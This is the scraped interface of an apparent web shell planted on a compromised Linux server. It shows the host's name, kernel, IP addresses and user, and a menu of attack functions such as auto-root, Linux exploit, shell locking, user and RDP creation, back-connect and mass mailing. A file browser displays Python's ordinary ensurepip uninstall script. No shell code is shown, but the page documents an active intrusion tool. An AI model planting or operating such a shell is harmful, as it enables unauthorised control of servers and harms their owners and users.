Linux server.bornosky.com 4.18.0-477.13.1.lve.el8.x86_64 #1 SMP Thu Jun 1 16:40:47 EDT 2023 x86_64
Apache
: 95.217.200.235 | : 3.149.254.229
Cant Read [ /etc/named.conf ]
7.3.33
aggscedu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib64 /
python2.7 /
ensurepip /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
7.04
KB
-rw-r--r--
__init__.pyc
6.33
KB
-rw-r--r--
__init__.pyo
6.33
KB
-rw-r--r--
__main__.py
88
B
-rw-r--r--
__main__.pyc
265
B
-rw-r--r--
__main__.pyo
265
B
-rw-r--r--
_uninstall.py
808
B
-rw-r--r--
_uninstall.pyc
1.1
KB
-rw-r--r--
_uninstall.pyo
1.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _uninstall.py
"""Basic pip uninstallation support, helper for the Windows uninstaller""" import argparse import ensurepip import sys def _main(argv=None): parser = argparse.ArgumentParser(prog="python -m ensurepip._uninstall") parser.add_argument( "--version", action="version", version="pip {}".format(ensurepip.version()), help="Show the version of pip this will attempt to uninstall.", ) parser.add_argument( "-v", "--verbose", action="count", default=0, dest="verbosity", help=("Give more output. Option is additive, and can be used up to 3 " "times."), ) args = parser.parse_args(argv) return ensurepip._uninstall_helper(verbosity=args.verbosity) if __name__ == "__main__": sys.exit(_main())
Close